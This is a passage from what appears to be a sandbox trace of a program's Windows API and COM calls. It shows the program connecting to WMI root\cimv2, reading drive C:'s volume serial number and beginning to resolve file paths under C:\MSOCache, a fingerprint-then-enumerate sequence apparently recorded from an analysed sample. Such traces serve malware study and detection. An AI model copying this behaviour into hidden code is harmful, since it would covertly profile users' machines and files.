Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6c0f304 | out: ppvObject=0x6c0f304*=0x6030a20) returned 0x0 [0194.781] WbemDefPath:IUnknown:AddRef (This=0x6030a20) returned 0x3 [0194.781] WbemDefPath:IUnknown:Release (This=0x6030a20) returned 0x2 [0194.781] WbemDefPath:IWbemPath:SetText (This=0x6030a20, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0194.781] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030a20, puCount=0x6c0f48c | out: puCount=0x6c0f48c*=0x0) returned 0x0 [0194.781] WbemDefPath:IWbemPath:GetText (in: This=0x6030a20, lFlags=2, puBuffLength=0x6c0f488*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f488*=0x20, pszText=0x0) returned 0x0 [0194.781] WbemDefPath:IWbemPath:GetText (in: This=0x6030a20, lFlags=2, puBuffLength=0x6c0f488*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f488*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0194.781] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030a20, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0194.781] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030a20, puCount=0x6c0f48c | out: puCount=0x6c0f48c*=0x0) returned 0x0 [0194.781] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030a20, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0194.781] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030a20, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0194.781] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030a20, puCount=0x6c0f40c | out: puCount=0x6c0f40c*=0x0) returned 0x0 [0194.781] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x6c0f3f8 | out: puCount=0x6c0f3f8*=0x2) returned 0x0 [0194.781] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6c0f3f4*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3f4*=0xf, pszText=0x0) returned 0x0 [0194.782] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6c0f3f4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3f4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0194.782] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f3a8 | out: ppv=0x6c0f3a8*=0xb51e34) returned 0x0 [0194.782] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f3a0 | out: pAptType=0x6c0f3a0*=1) returned 0x0 [0194.782] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f3a4 | out: ppvObject=0x6c0f3a4*=0x0) returned 0x80004002 [0194.782] IUnknown:Release (This=0xb51e34) returned 0x1 [0194.783] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0ed10 | out: ppv=0x6c0ed10*=0x6027640) returned 0x0 [0194.783] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027640, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0ef28 | out: ppvObject=0x6c0ef28*=0x0) returned 0x80004002 [0194.783] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027640, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ef3c | out: ppvObject=0x6c0ef3c*=0x60309b0) returned 0x0 [0194.783] WbemDefPath:IUnknown:Release (This=0x6027640) returned 0x0 [0194.783] WbemDefPath:IUnknown:QueryInterface (in: This=0x60309b0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eb5c | out: ppvObject=0x6c0eb5c*=0x60309b0) returned 0x0 [0194.783] WbemDefPath:IUnknown:QueryInterface (in: This=0x60309b0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0eb18 | out: ppvObject=0x6c0eb18*=0x0) returned 0x80004002 [0194.783] WbemDefPath:IUnknown:AddRef (This=0x60309b0) returned 0x3 [0194.783] WbemDefPath:IUnknown:QueryInterface (in: This=0x60309b0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e474 | out: ppvObject=0x6c0e474*=0x0) returned 0x80004002 [0194.783] WbemDefPath:IUnknown:QueryInterface (in: This=0x60309b0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e424 | out: ppvObject=0x6c0e424*=0x0) returned 0x80004002 [0194.783] WbemDefPath:IUnknown:QueryInterface (in: This=0x60309b0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e430 | out: ppvObject=0x6c0e430*=0x66ccd88) returned 0x0 [0194.783] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ccd88, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e438 | out: pCid=0x6c0e438*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0194.783] WbemDefPath:IUnknown:Release (This=0x66ccd88) returned 0x3 [0194.783] CoGetContextToken (in: pToken=0x6c0e490 | out: pToken=0x6c0e490) returned 0x0 [0194.784] CoGetContextToken (in: pToken=0x6c0e898 | out: pToken=0x6c0e898) returned 0x0 [0194.784] WbemDefPath:IUnknown:QueryInterface (in: This=0x60309b0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e928 | out: ppvObject=0x6c0e928*=0x0) returned 0x80004002 [0194.784] WbemDefPath:IUnknown:Release (This=0x60309b0) returned 0x2 [0194.784] WbemDefPath:IUnknown:Release (This=0x60309b0) returned 0x1 [0194.784] CoGetContextToken (in: pToken=0x6c0f220 | out: pToken=0x6c0f220) returned 0x0 [0194.784] CoGetContextToken (in: pToken=0x6c0f180 | out: pToken=0x6c0f180) returned 0x0 [0194.784] WbemDefPath:IUnknown:QueryInterface (in: This=0x60309b0, riid=0x6c0f250*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6c0f24c | out: ppvObject=0x6c0f24c*=0x60309b0) returned 0x0 [0194.784] WbemDefPath:IUnknown:AddRef (This=0x60309b0) returned 0x3 [0194.784] WbemDefPath:IUnknown:Release (This=0x60309b0) returned 0x2 [0194.784] WbemDefPath:IWbemPath:SetText (This=0x60309b0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0194.784] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60309b0, puCount=0x6c0f3d0 | out: puCount=0x6c0f3d0*=0x2) returned 0x0 [0194.784] WbemDefPath:IWbemPath:GetText (in: This=0x60309b0, lFlags=4, puBuffLength=0x6c0f3cc*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3cc*=0xf, pszText=0x0) returned 0x0 [0194.784] WbemDefPath:IWbemPath:GetText (in: This=0x60309b0, lFlags=4, puBuffLength=0x6c0f3cc*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3cc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0194.784] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f3d0 | out: ppv=0x6c0f3d0*=0xb51e34) returned 0x0 [0194.784] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f3c8 | out: pAptType=0x6c0f3c8*=1) returned 0x0 [0194.784] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f3cc | out: ppvObject=0x6c0f3cc*=0x0) returned 0x80004002 [0194.784] IUnknown:Release (This=0xb51e34) returned 0x1 [0194.785] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0eff0 | out: ppv=0x6c0eff0*=0x6023b28) returned 0x0 [0194.785] WbemLocator:IUnknown:QueryInterface (in: This=0x6023b28, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0f208 | out: ppvObject=0x6c0f208*=0x0) returned 0x80004002 [0194.785] WbemLocator:IClassFactory:CreateInstance (in: This=0x6023b28, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f21c | out: ppvObject=0x6c0f21c*=0x6027690) returned 0x0 [0194.785] WbemLocator:IUnknown:Release (This=0x6023b28) returned 0x0 [0194.785] WbemLocator:IUnknown:QueryInterface (in: This=0x6027690, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ee3c | out: ppvObject=0x6c0ee3c*=0x6027690) returned 0x0 [0194.785] WbemLocator:IUnknown:QueryInterface (in: This=0x6027690, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0edf8 | out: ppvObject=0x6c0edf8*=0x0) returned 0x80004002 [0194.786] WbemLocator:IUnknown:AddRef (This=0x6027690) returned 0x3 [0194.786] WbemLocator:IUnknown:QueryInterface (in: This=0x6027690, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e754 | out: ppvObject=0x6c0e754*=0x0) returned 0x80004002 [0194.786] WbemLocator:IUnknown:QueryInterface (in: This=0x6027690, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e704 | out: ppvObject=0x6c0e704*=0x0) returned 0x80004002 [0194.786] WbemLocator:IUnknown:QueryInterface (in: This=0x6027690, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e710 | out: ppvObject=0x6c0e710*=0x0) returned 0x80004002 [0194.786] CoGetContextToken (in: pToken=0x6c0e770 | out: pToken=0x6c0e770) returned 0x0 [0194.786] CoGetContextToken (in: pToken=0x6c0eb78 | out: pToken=0x6c0eb78) returned 0x0 [0194.786] WbemLocator:IUnknown:QueryInterface (in: This=0x6027690, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ec08 | out: ppvObject=0x6c0ec08*=0x0) returned 0x80004002 [0194.786] WbemLocator:IUnknown:Release (This=0x6027690) returned 0x2 [0194.786] WbemLocator:IUnknown:Release (This=0x6027690) returned 0x1 [0194.786] CoGetContextToken (in: pToken=0x6c0f1e8 | out: pToken=0x6c0f1e8) returned 0x0 [0194.786] CoGetContextToken (in: pToken=0x6c0f148 | out: pToken=0x6c0f148) returned 0x0 [0194.786] WbemLocator:IUnknown:QueryInterface (in: This=0x6027690, riid=0x6c0f218*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6c0f214 | out: ppvObject=0x6c0f214*=0x6027690) returned 0x0 [0194.786] WbemLocator:IUnknown:AddRef (This=0x6027690) returned 0x3 [0194.786] WbemLocator:IUnknown:Release (This=0x6027690) returned 0x2 [0194.786] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60309b0, puCount=0x6c0f3ac | out: puCount=0x6c0f3ac*=0x2) returned 0x0 [0194.786] WbemDefPath:IWbemPath:GetText (in: This=0x60309b0, lFlags=8, puBuffLength=0x6c0f3a8*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3a8*=0xf, pszText=0x0) returned 0x0 [0194.786] WbemDefPath:IWbemPath:GetText (in: This=0x60309b0, lFlags=8, puBuffLength=0x6c0f3a8*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3a8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0194.786] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6c0f284 | out: ppv=0x6c0f284*=0x6027590) returned 0x0 [0194.786] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027590, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6c0f318 | out: ppNamespace=0x6c0f318*=0x603305c) returned 0x0 [0195.285] WbemLocator:IUnknown:QueryInterface (in: This=0x603305c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1b4 | out: ppvObject=0x6c0f1b4*=0xb5bd64) returned 0x0 [0195.285] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5bd64, pProxy=0x603305c, pAuthnSvc=0x6c0f204, pAuthzSvc=0x6c0f200, pServerPrincName=0x6c0f1f8, pAuthnLevel=0x6c0f1fc, pImpLevel=0x6c0f1ec, pAuthInfo=0x6c0f1f0, pCapabilites=0x6c0f1f4 | out: pAuthnSvc=0x6c0f204*=0xa, pAuthzSvc=0x6c0f200*=0x0, pServerPrincName=0x6c0f1f8, pAuthnLevel=0x6c0f1fc*=0x6, pImpLevel=0x6c0f1ec*=0x2, pAuthInfo=0x6c0f1f0, pCapabilites=0x6c0f1f4*=0x1) returned 0x0 [0195.285] WbemLocator:IUnknown:Release (This=0xb5bd64) returned 0x1 [0195.285] WbemLocator:IUnknown:QueryInterface (in: This=0x603305c, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1a8 | out: ppvObject=0x6c0f1a8*=0xb5bd84) returned 0x0 [0195.285] WbemLocator:IUnknown:QueryInterface (in: This=0x603305c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1a4 | out: ppvObject=0x6c0f1a4*=0xb5bd64) returned 0x0 [0195.285] WbemLocator:IClientSecurity:SetBlanket (This=0xb5bd64, pProxy=0x603305c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0195.286] WbemLocator:IUnknown:Release (This=0xb5bd64) returned 0x2 [0195.286] WbemLocator:IUnknown:Release (This=0xb5bd84) returned 0x1 [0195.286] CoTaskMemFree (pv=0xbe1468) [0195.286] WbemLocator:IUnknown:Release (This=0x6027590) returned 0x0 [0195.286] WbemLocator:IUnknown:QueryInterface (in: This=0x603305c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eda4 | out: ppvObject=0x6c0eda4*=0xb5bd84) returned 0x0 [0195.286] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0ed60 | out: ppvObject=0x6c0ed60*=0x0) returned 0x80004002 [0195.286] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0eb7c | out: ppvObject=0x6c0eb7c*=0x0) returned 0x80004002 [0195.287] WbemLocator:IUnknown:AddRef (This=0xb5bd84) returned 0x3 [0195.287] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e6bc | out: ppvObject=0x6c0e6bc*=0x0) returned 0x80004002 [0195.287] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e66c | out: ppvObject=0x6c0e66c*=0x0) returned 0x80004002 [0195.287] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e678 | out: ppvObject=0x6c0e678*=0xb5bce4) returned 0x0 [0195.287] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5bce4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e680 | out: pCid=0x6c0e680*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0195.287] WbemLocator:IUnknown:Release (This=0xb5bce4) returned 0x3 [0195.287] CoGetContextToken (in: pToken=0x6c0e6d8 | out: pToken=0x6c0e6d8) returned 0x0 [0195.288] CoGetContextToken (in: pToken=0x6c0eae0 | out: pToken=0x6c0eae0) returned 0x0 [0195.288] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eb70 | out: ppvObject=0x6c0eb70*=0xb5bd6c) returned 0x0 [0195.288] WbemLocator:IRpcOptions:Query (in: This=0xb5bd6c, pPrx=0xb5bd84, dwProperty=2, pdwValue=0x6c0eb98 | out: pdwValue=0x6c0eb98) returned 0x80004002 [0195.288] WbemLocator:IUnknown:Release (This=0xb5bd6c) returned 0x3 [0195.288] WbemLocator:IUnknown:Release (This=0xb5bd84) returned 0x2 [0195.288] CoGetContextToken (in: pToken=0x6c0f0b8 | out: pToken=0x6c0f0b8) returned 0x0 [0195.288] CoGetContextToken (in: pToken=0x6c0f018 | out: pToken=0x6c0f018) returned 0x0 [0195.288] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x6c0f0e8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6c0f0e4 | out: ppvObject=0x6c0f0e4*=0x603305c) returned 0x0 [0195.288] WbemLocator:IUnknown:AddRef (This=0x603305c) returned 0x4 [0195.288] WbemLocator:IUnknown:Release (This=0x603305c) returned 0x3 [0195.288] WbemLocator:IUnknown:Release (This=0x603305c) returned 0x2 [0195.288] SysStringLen (param_1=0x0) returned 0x0 [0195.288] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030a20, puCount=0x6c0f47c | out: puCount=0x6c0f47c*=0x0) returned 0x0 [0195.288] WbemDefPath:IWbemPath:GetText (in: This=0x6030a20, lFlags=2, puBuffLength=0x6c0f478*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f478*=0x20, pszText=0x0) returned 0x0 [0195.288] WbemDefPath:IWbemPath:GetText (in: This=0x6030a20, lFlags=2, puBuffLength=0x6c0f478*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f478*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0195.288] CoGetContextToken (in: pToken=0x6c0f0e8 | out: pToken=0x6c0f0e8) returned 0x0 [0195.288] WbemLocator:IUnknown:AddRef (This=0xb5bd84) returned 0x3 [0195.288] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ef7c | out: ppvObject=0x6c0ef7c*=0xb5bd84) returned 0x0 [0195.288] WbemLocator:IUnknown:Release (This=0xb5bd84) returned 0x3 [0195.288] WbemLocator:IUnknown:Release (This=0xb5bd84) returned 0x2 [0195.288] WbemDefPath:IWbemPath:GetText (in: This=0x6030a20, lFlags=2, puBuffLength=0x6c0f480*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f480*=0x20, pszText=0x0) returned 0x0 [0195.288] WbemDefPath:IWbemPath:GetText (in: This=0x6030a20, lFlags=2, puBuffLength=0x6c0f480*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f480*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0195.288] IWbemServices:GetObject (in: This=0x603305c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6c0f434*=0x0, ppCallResult=0x0 | out: ppObject=0x6c0f434*=0x6027b20, ppCallResult=0x0) returned 0x0 [0195.448] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60309b0, puCount=0x6c0f434 | out: puCount=0x6c0f434*=0x2) returned 0x0 [0195.448] WbemDefPath:IWbemPath:GetText (in: This=0x60309b0, lFlags=4, puBuffLength=0x6c0f430*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f430*=0xf, pszText=0x0) returned 0x0 [0195.448] WbemDefPath:IWbemPath:GetText (in: This=0x60309b0, lFlags=4, puBuffLength=0x6c0f430*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f430*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0195.448] IWbemClassObject:Get (in: This=0x6027b20, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6c0f430*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x388ef84*=0, plFlavor=0x388ef88*=0 | out: pVal=0x6c0f430*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x388ef84*=8, plFlavor=0x388ef88*=0) returned 0x0 [0195.448] SysStringByteLen (bstr="9C354B42") returned 0x10 [0195.448] SysStringByteLen (bstr="9C354B42") returned 0x10 [0195.449] IWbemClassObject:Get (in: This=0x6027b20, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6c0f438*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x388ef84*=8, plFlavor=0x388ef88*=0 | out: pVal=0x6c0f438*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x388ef84*=8, plFlavor=0x388ef88*=0) returned 0x0 [0195.449] SysStringByteLen (bstr="9C354B42") returned 0x10 [0195.449] SysStringByteLen (bstr="9C354B42") returned 0x10 [0195.449] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x6c0f038, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0195.449] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All 